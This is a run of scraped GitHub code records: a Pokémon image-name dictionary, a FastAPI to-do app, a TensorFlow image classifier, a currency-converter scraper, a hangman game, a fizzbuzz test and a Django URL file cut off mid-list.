}\n z = pd.DataFrame(d, index=[0])\n z.to_excel('name.xlsx')\n\n\nif __name__ == \"__main__\":\n link()\n","repo_name":"eugenerush/parser","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"358669428","text":"poke_names = {\n\n \"Bulbasaur\" : \"1.png\",\n \"Ivysaur\" : \"2.png\",\n \"Vensaur\" : \"3.png\",\n \"Charmander\": \"4.png\",\n \"Charmeleon\": \"5.png\",\n \"Charizard\" : \"6.png\",\n \"Squirtle\" : \"7.png\",\n \"Wartortle\" : \"8.png\",\n \"Blastoise\" : \"9.png\",\n \"Caterpie\" : \"10.png\",\n \"Metapod\" : \"11.png\",\n \"Butterfree\": \"12.png\",\n \"Weedle\" : \"13.png\",\n \"Kakuna\" : \"14.png\",\n \"Beedrill\" : \"15.png\",\n \"Pidgey\" : \"16.png\",\n \"Pidgeotto\" : \"17.png\",\n \"Pidgeot\" : \"18.png\",\n \"Rattata\" : \"19.png\",\n \"Raticate\" : \"20.png\",\n \"Spearow\" : \"21.png\",\n \"Fearow\" : \"22.png\",\n \"Ekans\" : \"23.png\",\n \"Arbok\" : \"24.png\",\n \"Pikachu\" : \"25.png\",\n \"Raichu\" : \"26.png\",\n \"Sandshrew\" : \"27.png\",\n \"Sandslash\" : \"28.png\",\n \"Nidoran F\" : \"29.png\",\n \"Nidorina\" : \"30.png\",\n \"Nidoqueen\" : \"31.png\",\n \"Nidoran M\" : \"32.png\",\n \"Nidorino\" : \"33.png\",\n \"Nidoking\" : \"34.png\",\n \"Clefairy\" : \"35.png\",\n \"Clefable\" : \"36.png\",\n \"Vulpix\" : \"37.png\",\n \"Ninetales\" : \"38.png\",\n \"Jigglypuff\": \"39.png\",\n \"Wigglytuff\": \"40.png\",\n \"Zubat\" : \"41.png\",\n \"Golbat\" : \"42.png\",\n \"Oddish\" : \"43.png\",\n \"Gloom\" : \"44.png\",\n \"Vileplume\" : \"45.png\",\n \"Paras\" : \"46.png\",\n \"Parasect\" : \"47.png\",\n \"Venonat\" : \"48.png\",\n \"Venomoth\" : \"49.png\",\n \"Diglett\" : \"50.png\",\n \"Dugtrio\" : \"51.png\",\n \"Meowth\" : \"52.png\",\n \"Persian\" : \"53.png\",\n \"Psyduck\" : \"54.png\",\n \"Golduck\" : \"55.png\",\n \"Mankey\" : \"56.png\",\n \"Primeape\" : \"57.png\",\n \"Growlithe\" : \"58.png\",\n \"Arcanine\" : \"59.png\",\n \"Poliwag\" : \"60.png\",\n \"Poliwhirl\" : \"61.png\",\n \"Poliwrath\" : \"62.png\",\n \"Abra\" : \"63.png\",\n \"Kadabra\" : \"64.png\",\n \"Alakazam\" : \"65.png\",\n \"Machop\" : \"66.png\",\n \"Machoke\" : \"67.png\",\n \"Machamp\" : \"68.png\",\n \"Bellsprout\": \"69.png\",\n \"Weepinbell\": \"70.png\",\n \"Victreebel\": \"71.png\",\n \"Tentacool\" : \"72.png\",\n \"Tentacruel\": \"73.png\",\n \"Geodude\" : \"74.png\",\n \"Graveler\" : \"75.png\",\n \"Golem\" : \"76.png\",\n \"Ponyta\" : \"77.png\",\n \"Rapidash\" : \"78.png\",\n \"Slowpoke\" : \"79.png\",\n \"Slowbro\" : \"80.png\",\n \"Magnemite\" : \"81.png\",\n \"Magneton\" : \"82.png\",\n \"Farfetch'd\": \"83.png\",\n \"Doduo\" : \"84.png\",\n \"Dodrio\" : \"85.png\",\n \"Seel\" : \"86.png\",\n \"Dewgong\" : \"87.png\",\n \"Grimer\" : \"88.png\",\n \"Muk\" : \"89.png\",\n \"Shellder\" : \"90.png\",\n \"Cloyster\" : \"91.png\",\n \"Gastly\" : \"92.png\",\n \"Haunter\" : \"93.png\",\n \"Gengar\" : \"94.png\",\n \"Onix\" : \"95.png\",\n \"Drowzee\" : \"96.png\",\n \"Hypno\" : \"97.png\",\n \"Krabby\" : \"98.png\",\n \"Kingler\" : \"99.png\",\n \"Voltorb\" : \"100.png\",\n \"Electrode\" : \"101.png\",\n \"Exeggcute\" : \"102.png\",\n \"Exeggutor\" : \"103.png\",\n \"Cubone\" : \"104.png\",\n \"Marowak\" : \"105.png\",\n \"Hitmonlee\" : \"106.png\",\n \"Hitmonchan\": \"107.png\",\n \"Lickitung\" : \"108.png\",\n \"Koffing\" : \"109.png\",\n \"Weezing\" : \"110.png\",\n \"Rhyhorn\" : \"111.png\",\n \"Rhydon\" : \"112.png\",\n \"Chansey\" : \"113.png\",\n \"Tangela\" : \"114.png\",\n \"Kangaskhan\": \"115.png\",\n \"Horsea\" : \"116.png\",\n \"Seadra\" : \"117.png\",\n \"Goldeen\" : \"118.png\",\n \"Seaking\" : \"119.png\",\n \"Staryu\" : \"120.png\",\n \"Starmie\" : \"121.png\",\n \"Mr. Mime\" : \"122.png\",\n \"Scyther\" : \"123.png\",\n \"Jynx\" : \"124.png\",\n \"Electabuzz\": \"125.png\",\n \"Magmar\" : \"126.png\",\n \"Pinsir\" : \"127.png\",\n \"Tauros\" : \"128.png\",\n \"Magikarp\" : \"129.png\",\n \"Gyarados\" : \"130.png\",\n \"Lapras\" : \"131.png\",\n \"Ditto\" : \"132.png\",\n \"Eevee\" : \"133.png\",\n \"Vaporeon\" : \"134.png\",\n \"Jolteon\" : \"135.png\",\n \"Flareon\" : \"136.png\",\n \"Porygon\" : \"137.png\",\n \"Omanyte\" : \"138.png\",\n \"Omastar\" : \"139.png\",\n \"Kabuto\" : \"140.png\",\n \"Kabutops\" : \"141.png\",\n \"Aerodactyl\": \"142.png\",\n \"Snorlax\" : \"143.png\",\n \"Articuno\" : \"144.png\",\n \"Zapdos\" : \"145.png\",\n \"Moltres\" : \"146.png\",\n \"Dratini\" : \"147.png\",\n \"Dragonair\" : \"148.png\",\n \"Dragonite\" : \"149.png\",\n \"Mewtwo\" : \"150.png\",\n \"Mew\" : \"151.png\",\n \"Chikorita\" : \"152.png\",\n \"Bayleef\" : \"153.png\",\n \"Meganium\" : \"154.png\",\n \"Cyndaquil\" : \"155.png\",\n \"Quilava\" : \"156.png\",\n \"Typhlosion\": \"157.png\",\n \"Totodile\" : \"158.png\",\n \"Feraligatr\": \"159.png\",\n \"Sentret\" : \"160.png\",\n \"Furret\" : \"161.png\",\n \"Hoothoot\" : \"162.png\",\n \"Noctowl\" : \"163.png\",\n \"Ledyba\" : \"164.png\",\n \"Ledian\" : \"165.png\",\n \"Spinarak\" : \"166.png\",\n \"Ariados\" : \"167.png\",\n \"Ariados\" : \"168.png\",\n \"Crobat\" : \"169.png\",\n \"Chinchou\" : \"170.png\",\n \"Lanturn\" : \"171.png\",\n \"Pichu\" : \"172.png\",\n \"Cleffa\" : \"173.png\",\n \"Igglybuff\" : \"174.png\",\n \"Togepi\" : \"175.png\",\n \"Togetic\" : \"176.png\",\n \"Natu\" : \"177.png\",\n \"Xatu\" : \"178.png\",\n \"Mareep\" : \"179.png\",\n \"Flaaffy\" : \"180.png\",\n \"Ampharos\" : \"181.png\",\n \"Bellossom\" : \"182.png\",\n \"Marill\" : \"183.png\",\n \"Azumarill\" : \"184.png\",\n \"Sudowoodo\" : \"185.png\",\n \"Politoed\" : \"186.png\",\n \"Hoppip\" : \"187.png\",\n \"Skiploom\" : \"188.png\",\n \"Jumpluff\" : \"189.png\",\n \"Aipom\" : \"190.png\",\n \"Sunkern\" : \"191.png\",\n \"Sunflora\" : \"192.png\",\n \"Yanma\" : \"193.png\",\n \"Wooper\" : \"194.png\",\n \"Quagsire\" : \"195.png\",\n \"Espeon\" : \"196.png\",\n \"Umbreon\" : \"197.png\",\n \"Murkrow\" : \"198.png\",\n \"Slowking\" : \"199.png\",\n \"misdreavus\": \"200.png\",\n \"Unown\" : \"201.png\",\n \"Wobbuffet\" : \"202.png\",\n \"Girafarig\" : \"203.png\",\n \"Pineco\" : \"204.png\",\n \"Forretress\": \"205.png\",\n \"Dunsparce\" : \"206.png\",\n \"Gligar\" : \"207.png\",\n \"Steelix\" : \"208.png\",\n \"Snubbull\" : \"209.png\",\n \"Granbull\" : \"210.png\",\n \"Qwilfish\" : \"211.png\",\n \"Scizor\" : \"212.png\",\n \"Shuckle\" : \"213.png\",\n \"Heracross\" : \"214.png\",\n \"Sneasel\" : \"215.png\",\n \"Teddiursa\" : \"216.png\",\n \"Ursaring\" : \"217.png\",\n \"Slugma\" : \"218.png\",\n \"Magcargo\" : \"219.png\",\n \"Swinub\" : \"220.png\",\n \"Piloswine\" : \"221.png\",\n \"Corsola\" : \"222.png\",\n \"Remoraid\" : \"223.png\",\n \"Octillery\" : \"224.png\",\n \"Delibird\" : \"225.png\",\n \"Mantine\" : \"226.png\",\n \"Skarmory\" : \"227.png\",\n \"Houndour\" : \"228.png\",\n \"Houndoom\" : \"229.png\",\n \"Kingdra\" : \"230.png\",\n \"Phanpy\" : \"231.png\",\n \"Donphan\" : \"232.png\",\n \"Porygon2\" : \"233.png\",\n \"Stantler\" : \"234.png\",\n \"Smeargle\" : \"235.png\",\n \"Tyrouge\" : \"236.png\",\n \"Hitmontop\" : \"237.png\",\n \"Smoochum\" : \"238.png\",\n \"Elekid\" : \"239.png\",\n \"Magby\" : \"240.png\",\n \"Miltank\" : \"241.png\",\n \"Blissey\" : \"242.png\",\n \"Raikou\" : \"243.png\",\n \"Entei\" : \"244.png\",\n \"Suicune\" : \"245.png\",\n \"Lavitar\" : \"246.png\",\n \"Pupitar\" : \"247.png\",\n \"Tyranitar\" : \"248.png\",\n \"Lugia\" : \"249.png\",\n \"Ho-Oh\" : \"250.png\",\n \"Celebi\" : \"251.png\",\n \"Treecko\" : \"252.png\",\n \"Grovyle\" : \"253.png\",\n \"Sceptile\" : \"254.png\",\n \"Torchic\" : \"255.png\",\n \"Combusken\" : \"256.png\",\n \"Blaziken\" : \"257.png\",\n \"Mudkip\" : \"258.png\",\n \"Marshtomp\" : \"259.png\",\n \"Swampert\" : \"260.png\",\n \"Poochyena\" : \"261.png\",\n \"Mightyena\" : \"262.png\",\n \"Zigzagoon\" : \"263.png\",\n \"Linoone\" : \"264.png\",\n \"Wurmple\" : \"265.png\",\n \"Silcoon\" : \"266.png\",\n \"Beautifly\" : \"267.png\",\n \"Cascoon\" : \"268.png\",\n \"Dustox\" : \"269.png\",\n \"Lotad\" : \"270.png\",\n \"Lombre\" : \"271.png\",\n \"Ludicolo\" : \"272.png\",\n \"Seedot\" : \"273.png\",\n \"Nuzleaf\" : \"274.png\",\n \"Shiftry\" : \"275.png\",\n \"Taillow\" : \"276.png\",\n \"Swellow\" : \"277.png\",\n \"Wingull\" : \"278.png\",\n \"Pelipper\" : \"279.png\",\n \"Ralts\" : \"280.png\",\n \"Kirlia\" : \"281.png\",\n \"Gardevoir\" : \"282.png\",\n \"Surskit\" : \"283.png\",\n \"Masquerain\" : \"284.png\",\n \"Shroomish\" : \"285.png\",\n \"Breloom\" : \"286.png\",\n \"Slakoth\" : \"287.png\",\n \"Vigoroth\" : \"288.png\",\n \"Slaking\" : \"289.png\",\n \"Nincada\" : \"290.png\",\n \"Ninjask\" : \"291.png\",\n \"Shedinja\" : \"292.png\",\n \"Whismur\" : \"293.png\",\n \"Loudred\" : \"294.png\",\n \"Exploud\" : \"295.png\",\n \"Makuhita\" : \"296.png\",\n \"Hariyama\" : \"297.png\",\n \"Azurill\" : \"298.png\",\n \"Nosepass\" : \"299.png\",\n \"Skitty\" : \"300.png\",\n \"Delcatty\" : \"301.png\",\n \"Sableye\" : \"302.png\",\n \"Mawile\" : \"303.png\",\n \"Aron\" : \"304.png\",\n \"Lairon\" : \"305.png\",\n \"Aggron\" : \"306.png\",\n \"Meditite\" : \"307.png\",\n \"Medicham\" : \"308.png\",\n \"Electrike\" : \"309.png\",\n \"Manectric\" : \"310.png\",\n \"Plusle\" : \"311.png\",\n \"Minum\" : \"312.png\",\n \"Volbeat\" : \"313.png\",\n \"Illumise\" : \"314.png\",\n \"Roselia\" : \"315.png\",\n \"Gulpin\" : \"316.png\",\n \"Swalot\" : \"317.png\",\n \"Carvanha\" : \"318.png\",\n \"Sharpedo\" : \"319.png\",\n \"Wailmer\" : \"320.png\",\n \"Wailord\" : \"321.png\",\n \"Numel\" : \"322.png\",\n \"Camerupt\" : \"323.png\",\n \"Torkoal\" : \"324.png\",\n \"Spoink\" : \"325.png\",\n \"Grumpig\" : \"326.png\",\n \"Spinda\" : \"327.png\",\n \"Trapinch\" : \"328.png\",\n \"Vibrava\" : \"329.png\",\n \"Flygon\" : \"330.png\",\n \"Cacnea\" : \"331.png\",\n \"Cacturne\" : \"332.png\",\n \"Swablu\" : \"333.png\",\n \"Altaria\" : \"334.png\",\n \"Zangoose\" : \"335.png\",\n \"Seviper\" : \"336.png\",\n \"Lunatone\" : \"337.png\",\n \"Solrock\" : \"338.png\",\n \"Barboach\" : \"339.png\",\n \"Wiscash\" : \"340.png\",\n \"Corphish\" : \"341.png\",\n \"Crawdaunt\" : \"342.png\",\n \"Baltoy\" : \"343.png\",\n \"Claydol\" : \"344.png\",\n \"Lileep\" : \"345.png\",\n \"Cradily\" : \"346.png\",\n \"Anorith\" : \"347.png\",\n \"Armaldo\" : \"348.png\",\n \"Feebas\" : \"349.png\",\n \"Milotic\" : \"350.png\",\n \"Castform\" : \"351.png\",\n \"Kecleon\" : \"352.png\",\n \"Shuppet\" : \"353.png\",\n \"Banette\" : \"354.png\",\n \"Duskull\" : \"355.png\",\n \"Dusclops\" : \"356.png\",\n \"Tropius\" : \"357.png\",\n \"Chimecho\" : \"358.png\",\n \"Absol\" : \"359.png\",\n \"Wynaut\" : \"360.png\",\n \"Snorunt\" : \"361.png\",\n \"Glalie\" : \"362.png\",\n \"Spheal\" : \"363.png\",\n \"Sealeo\" : \"364.png\",\n \"Walrein\" : \"365.png\",\n \"Clamperl\" : \"366.png\",\n \"Huntail\" : \"367.png\",\n \"Gorebyss\" : \"368.png\",\n \"Relicanth\" : \"369.png\",\n \"Luvdisc\" : \"370.png\",\n \"Bagon\" : \"371.png\",\n \"Shelgon\" : \"372.png\",\n \"Salamence\" : \"373.png\",\n \"Beldum\" : \"374.png\",\n \"Metang\" : \"375.png\",\n \"Metagross\" : \"376.png\",\n \"Regirock\" : \"377.png\",\n \"Regice\" : \"378.png\",\n \"Registeel\" : \"379.png\",\n \"Latias\" : \"380.png\",\n \"Latios\" : \"381.png\",\n \"Kyogre\" : \"382.png\",\n \"Groudon\" : \"383.png\",\n \"Rayquaza\" : \"384.png\",\n \"Jirachi\" : \"385.png\",\n \"Deoxys\" : \"386.png\",\n \"Turtwig\" : \"387.png\",\n \"Grotle\" : \"388.png\" ,\n \"Torterra\" : \"389.png\" , \n \"Chimchar\" : \"390.png\" , \n \"Monferno\" : \"391.png\" , \n \"Infernape\" : \"392.png\" ,\n \"Piplup\" : \"393.png\" , \n \"Prinplup\" : \"394.png\" , \n \"Empoleon\" : \"395.png\" , \n \"Starly\" : \"396.png\" ,\n \"Staravia\" : \"397.png\" ,\n \"Staraptor\" : \"398.png\" ,\n \"Bidoof\" : \"399.png\" ,\n \"Babarel\" : \"400.png\" ,\n \"Kricketot\" : \"401.png\" ,\n \"Kricketune\" : \"402.png\" ,\n \"Shinx\" : \"403.png\" ,\n \"Luxio\" : \"404.png\" ,\n \"Luxray\" : \"405.png\" ,\n \"Budew\" : \"406.png\" ,\n \"Roserade\" : \"407.png\" ,\n \"Cranidos\" : \"408.png\" ,\n \"Rampardos\" : \"409.png\" ,\n \"Shieldon\" : \"410.png\" ,\n \"Bastiodon\" : \"411.png\" ,\n \"Burmy\" : \"412.png\" ,\n \"Wormadam\" : \"413.png\" ,\n \"Mothim\" : \"414.png\" ,\n \"Combee\" : \"415.png\" ,\n \"Vespiquen\" : \"416.png\" ,\n \"Pachirisu\" : \"417.png\" ,\n \"Buizel\" : \"418.png\" ,\n \"Floatzel\" : \"419.png\" ,\n \"Cherubi\" : \"420.png\" ,\n \"Cherrim\" : \"421.png\" ,\n \"Shellos\" : \"422.png\" ,\n \"Gastrodon\" : \"423.png\" ,\n \"Ambipom\" : \"424.png\" ,\n \"Drifloon\" : \"425.png\" ,\n \"Drifblim\" : \"426.png\" ,\n \"Buneary\" : \"427.png\" ,\n \"Lopunny\" : \"428.png\" ,\n \"Mismagius\" : \"429.png\" ,\n \"Honchkrow\" : \"430.png\" ,\n \"Glameow\" : \"431.png\" ,\n \"Purugly\" : \"432.png\" ,\n \"Chingling\" : \"433.png\" ,\n \"Stunky\" : \"434.png\" ,\n \"Stunktank\" : \"435.png\" ,\n \"Bronzor\" : \"436.png\" ,\n \"Bronzong\" : \"437.png\" ,\n \"Bonsly\" : \"438.png\" ,\n \"Mime Jr.\" : \"388.png\" ,\n \"Happiny\" : \"389.png\" , \n \"Chatot\" : \"390.png\" , \n \"Spiritomb\" : \"391.png\" ,\n \"Gible\" : \"392.png\" , \n \"Gibite\" : \"393.png\" , \n \"Garchomp\" : \"394.png\" , \n \"Munchlax\" : \"395.png\" ,\n \"Riolu\" : \"396.png\" ,\n \"Lucario\" : \"397.png\" ,\n \"Hippopotas\" : \"398.png\" ,\n \"Hippowdon\" : \"399.png\" ,\n \"Skorupi\" : \"400.png\" ,\n \"Drapion\" : \"401.png\" ,\n \"Croagunk\" : \"402.png\" ,\n \"Toxicroak\" : \"403.png\" ,\n \"Carnivine\" : \"404.png\" ,\n \"Finneon\" : \"405.png\" ,\n \"Lumineon\" : \"406.png\" ,\n \"Mantyke\" : \"407.png\" ,\n \"Snover\" : \"408.png\" ,\n \"Abomasnow\" : \"409.png\" ,\n \"Weavile\" : \"410.png\" ,\n \"Magnezone\" : \"411.png\" ,\n \"Lickilicky\" : \"412.png\" ,\n \"Rhyperior\" : \"413.png\" ,\n \"Tangrowth\" : \"414.png\" ,\n \"Electivire\" : \"415.png\" ,\n \"Magmortar\" : \"416.png\" ,\n \"Togekiss\" : \"417.png\" ,\n \"Yanmega\" : \"418.png\" ,\n \"Leafeon\" : \"419.png\" ,\n \"Glaceon\" : \"420.png\" ,\n \"Gliscor\" : \"421.png\" ,\n \"Mamoswine\" : \"422.png\" ,\n \"Porygon-z\" : \"423.png\" ,\n \"Gallade\" : \"424.png\" ,\n \"Probopass\" : \"425.png\" ,\n \"Dusknoir\" : \"426.png\" ,\n \"Frosslass\" : \"427.png\" ,\n \"Rotom\" : \"428.png\" ,\n \"Uxie\" : \"429.png\" ,\n \"Mesprit\" : \"430.png\" ,\n \"Azelf\" : \"431.png\" ,\n \"Dialga\" : \"432.png\" ,\n \"Palkia\" : \"433.png\" ,\n \"Heatran\" : \"434.png\" ,\n \"Regigigas\" : \"435.png\" ,\n \"Giratina\" : \"436.png\" ,\n \"Cresselia\" : \"437.png\" ,\n \"Phione\" : \"438.png\" ,\n \"Manaphy\" : \"439.png\" ,\n \"Darkrai\" : \"440.png\" ,\n \"Shaymin\" : \"441.png\" ,\n \"Arceus\" : \"442.png\" ,\n}","repo_name":"KevinLu19/PokemonGame","sub_path":"Pokemon/names.py","file_name":"names.py","file_ext":"py","file_size_in_byte":13851,"program_lang":"python","lang":"hr","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"} +{"seq_id":"3680875758","text":"from typing import List\nfrom unicodedata import name\nfrom uuid import uuid4\n\nfrom fastapi import Depends, FastAPI, HTTPException, status\nfrom sqlalchemy.orm import Session\n\nfrom database import engine, get_session\nfrom models import Base, TodoList, ListItem\nfrom schemas import ListItemRequest, ListItemResponse, ListRequest, ListResponse\n\nBase.metadata.create_all(engine)\napp = FastAPI()\n\n\n@app.get(\"/\")\ndef read_root():\n \"\"\"\n API information.\n \"\"\"\n return {\"message\": \"Mudapp to-do list, for all your shit.\"}\n\n\n@app.get(\"/list\", response_model=List[ListResponse])\ndef get_all_lists(session: Session = Depends(get_session)):\n \"\"\"\n Return a list of all to-do lists stored by the app.\n \"\"\"\n response = []\n lists = session.query(TodoList).all()\n for list in lists:\n items = session.query(ListItem).filter_by(id=list.id).all()\n list_response = ListResponse(\n id=list.id,\n name=list.name,\n items=[\n ListItemResponse(\n id=item.id,\n name=item.name,\n completed=item.completed,\n due_date=item.due_date if item.due_date else None,\n )\n for item in items\n ],\n )\n response.append(list_response)\n\n return response\n\n\n@app.post(\"/list\", response_model=ListResponse, status_code=status.HTTP_201_CREATED)\ndef create_list(request: ListRequest, session: Session = Depends(get_session)):\n \"\"\"\n Create a to-do list using the request content.\n \"\"\"\n # create list\n todo_list = TodoList(name=request.name)\n session.add(todo_list)\n session.commit()\n\n # create list items\n list_items = []\n if request.items:\n list_items = [\n ListItem(\n name=item.name,\n completed=False,\n due_date=item.due_date,\n id=todo_list.id\n ) for item in request.items\n ]\n session.add_all(list_items)\n session.commit()\n\n return ListResponse(id=todo_list.id, name=request.name, items=list_items)\n\n\n@app.get(\"/list/{id}\", response_model=ListResponse)\ndef get_list(id: int, session: Session = Depends(get_session)):\n \"\"\"\n Return a specific list by ID.\n \"\"\"\n list: TodoList = session.query(TodoList).get(id)\n if list is None:\n raise HTTPException(status_code=404, detail=\"List not found.\")\n\n return ListResponse(id=list.id, name=list.name, items=list.items)\n\n\n@app.put(\"/list/{id}\", response_model=ListResponse)\ndef rename_list(\n id: int, request: ListRequest, session: Session = Depends(get_session)\n):\n \"\"\"\n Rename an existing to-do list.\n \"\"\"\n list: TodoList = session.query(TodoList).get(id)\n if list is None:\n raise HTTPException(status_code=404, detail=\"List not found.\")\n list.name = request.name\n session.commit()\n\n return ListResponse(id=list.id, name=list.name, items=list.items)\n\n\n@app.delete(\"/list/{id}\")\ndef delete_list(id: int, session: Session = Depends(get_session)):\n \"\"\"\n Delete an existing to-do list.\n \"\"\"\n list: TodoList = session.query(TodoList).get(id)\n if list is None:\n raise HTTPException(status_code=404, detail=\"List not found.\")\n session.delete(list)\n session.commit()\n\n return {\"message\": \"List deleted.\"}\n","repo_name":"manudawber/mudapp","sub_path":"mudapp/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"11652327676","text":"import tensorflow as tf\nimport tensorflow_hub as hub\nfrom PIL import Image\nimport numpy as np\nimport argparse\nimport json\n\n\n\n\nimage_path=\"./test_images/\"\n\n\n\n##Load the model\nsaved_model=\"my_model.h5\"\nmodel=tf.keras.models.load_model(saved_model,custom_objects={'KerasLayer':hub.KerasLayer})\nmodel.summary()\n\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-i\",\"--image\", help=\"./test_images/\", required=False, default=1)\nparser.add_argument(\"-m\",\"--model\", help=\"my_model.h5\", required=False,default=2)\nparser.add_argument(\"-k\",\"--top_k\", help=\"top k probs of the image\",required=False, default=3)\nparser.add_argument(\"-c\",\"--category_names\",help=\"classes\",required=False,default=4)\n\nargs = vars(parser.parse_args())\n\nimage_path = args['image']\nsaved_model = args['model']\ntop_k = args['top_k']\ncategory_names = args['category_names']\nimage_size = 224\n\n\n\n# Create the process_image function\ndef process_image(numpy_image):\n print(numpy_image.shape)\n tensor_img=tf.image.convert_image_dtype(numpy_image, dtype=tf.int16, saturate=False)\n resized_img=tf.image.resize(numpy_image,(image_size,image_size)).numpy()\n normal_img=resized_img/255\n\n return normal_img \n\n# Create the predict function\ndef predict(image_path, model, top_k=3):\n #if top_k < 1:\n # top_k = 1\n image = Image.open(image_path)\n image = np.asarray(image)\n image = process_image(image)\n expanded_image = np.expand_dims(image, axis=0)\n probes = model.predict(expanded_image)\n top_k_values, top_k_indices = tf.nn.top_k(probes, k=top_k)\n \n top_k_values = top_k_values.numpy()\n top_k_indices = top_k_indices.numpy()\n \n \n\n return top_k_values, top_k_indices, image\n\n\nif category_names != None:\n with open(category_names, 'r') as f:\n class_names = json.load(f)\n print(\"Classes Values:\")\n top_k_values, top_k_indices = predict(image_path, model, topk=int(top_k))\n # top_k_values, top_k_indices = predict(image_path, model, top_k)\n for idx in top_k_indices[0]:\n print(\"-\",class_names[str(idx+1)])\n\n\nprint('Probabilties:', top_k_values)\nprint('Classes Keys:', top_k_indices) \n \n \n","repo_name":"aldovazquez90/Image_classifier_project_udacity","sub_path":"predict1.py","file_name":"predict1.py","file_ext":"py","file_size_in_byte":2142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"10840948288","text":"import os\nimport requests\nfrom bs4 import BeautifulSoup\nfrom babel.numbers import format_currency\n\nos.system(\"cls\")\n\n\"\"\"\nUse the 'format_currency' function to format the output of the conversion\nformat_currency(AMOUNT, CURRENCY_CODE, locale=\"ko_KR\" (no need to change this one))\n\"\"\"\n\ndef transferwise_crawl(transferurl):\n url = transferurl\n result = requests.get(url)\n soup = BeautifulSoup(result.text, \"html.parser\")\n \n div1 = soup.find(\"span\",{\"class\":\"text-success\"}).string\n \n\n rate = float(div1)\n # print(converted)\n return rate\n\n\ndef crawl():\n url = \"https://www.iban.com/currency-codes\"\n \n iban_result = requests.get(url)\n iban_soup = BeautifulSoup(iban_result.text, \"html.parser\")\n\n table = iban_soup.find(\"table\", {\"class\": \"table table-bordered downloads tablesorter\"})\n\n tbody = table.find(\"tbody\")\n tds = tbody.find_all(\"td\")\n\n information = {}\n length = len(tds)\n key = 0\n country = []\n for i in range(0, length, 4):\n if tds[i + 1].string == \"No universal currency\":\n continue\n else:\n country.append(tds[i].string.capitalize())\n country.append(tds[i + 1].string.capitalize())\n country.append(tds[i + 2].string)\n country.append(tds[i + 3].string)\n information[key] = country\n key = key + 1\n country = []\n\n return information\n\ndef caculator(money, value):\n return money * value\n \ndef main():\n country_dic = crawl()\n print(\"Welcome to CurrencyConvert PRO 2000: \\n\")\n\n for i in range(len(country_dic)):\n print('# {} {}'.format(i, country_dic[i][0]))\n\n print(\"Where are you from? Choose a country by number.\\n\")\n from_num = int(input(\"#: \"))\n print(f\"{country_dic[from_num][0]}\\n\")\n\n print(\"Now choose another country.\\n\")\n another_country_num = int(input(\"#: \"))\n print(f\"{country_dic[another_country_num][0]}\\n\")\n\n while (True):\n try:\n print(f\"How many {country_dic[from_num][2]} do you want to convert to {country_dic[another_country_num][2]}\")\n money = int(input())\n break\n except:\n print(\"That wasn't a number.\\n\")\n continue\n\n\n transfer_url = \"https://transferwise.com/gb/currency-converter/\"+ str(country_dic[from_num][2].lower())+\"-to-\"+str(country_dic[another_country_num][2].lower())+\"-rate\"+\"?amount=\"+str(money)+\"#rate-alerts\"\n value = transferwise_crawl(transfer_url)\n result = caculator(money, value)\n\n print(format_currency(money,country_dic[from_num][2],locale=\"ko_KR\")+\" is \",end='')\n print(format_currency(result,country_dic[another_country_num][2],locale=\"ko_KR\"))\n\nmain()","repo_name":"cheonjiwan/python_challenge","sub_path":"assignment/Day6.py","file_name":"Day6.py","file_ext":"py","file_size_in_byte":2692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"34366372883","text":"from scripts.hackerrank.fizzBuzz import fizzBuzz\n\nclass Test:\n test_cases = [\n [15, [1, 2, \"Fizz\", 4, \"Buzz\", \"Fizz\", 7, 8, \"Fizz\", \"Buzz\", 11, \"Fizz\", 13, 14, \"FizzBuzz\"]]\n ]\n testable_functions = [fizzBuzz]\n\n def test_fizz_buzz(self):\n for f in self.testable_functions:\n for case, expected in self.test_cases:\n assert f(case) == expected\n\n ","repo_name":"TrellixVulnTeam/learning_to_test_code_BL81","sub_path":"tests/hackerrank/test_fizzBuzz.py","file_name":"test_fizzBuzz.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"12232321199","text":"import random\n\n#create a list of all movies for the game\nlistofmovies=['avengers endgame','star wars the force awakens','avengers infinity war','jurassic world','the lion king','furious seven','black panther','harry potter',\n'frozen','beauty and the beast','incredibles two','iron man three','minions','aquaman','aladdin','finding dory','zootopia','spectre','spider man homecoming','batman v superman','hunger games'\n]\n#list of all vowels to remove everything except them from the name of the movie \nvowels=['a','e','i','o','u']\n#list of alphabets of 'hollywood' to cut them one by one everytime the user makes a wrong guess\nstring=['h','o','l','l','y','w','o','o','d']\n\n#choosing random movie from list of movies\nchoosen=random.choice(listofmovies)\n'''okay so quite a bit to explain here...\nfirst we remove the spaces from the name of movie using the split function which splits the string from there is a space\n'''\nremove_spaces=choosen.split(' ')\n\n'''secondly we take the previous variable and put a '/' where there was a space in the name using the join function\nif you feel it is too many functions, don't fret just head over to python docs to read about every function that I have used here'''\n\nchoosen='/'.join(remove_spaces)\n\n#create empty list to get the final string that is formatted to our desire\ntoshow=[]\n\ntempstring=string\nfor x in choosen:\n if x in vowels:\n toshow.append(x)\n elif x=='/': \n toshow.append('/')\n else:\n toshow.append('_')\n","repo_name":"vandanrohatgi/HW-python-project","sub_path":"task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":1483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"35597809308","text":"from django.urls import path\nfrom .views import (\n ItemListView,\n AddToCartView,\n OrderDetailView,\n AddCouponView,\n PaymentView,\n ItemDetailView,\n OrderItemDeleteView,\n OrderQuantityUpdateView,\n AddressListView,\n AddressCreateView,\n AddressUpdateView,\n AddressDeleteView,\n CountryListView,\n RegionListView,\n CityListView,\n UserIDView,\n OrderHistoryView,\n )\n\nurlpatterns = [\n path('products/', ItemListView.as_view(), name='product-list'),\n path('products//', ItemDetailView.as_view(), name='product-detail'),\n path('add-to-cart/', AddToCartView.as_view(), name='add-to-cart'),\n path('order-summary/', OrderDetailView.as_view(), name='order-summary'),\n path('order-items//delete/', OrderItemDeleteView.as_view(), 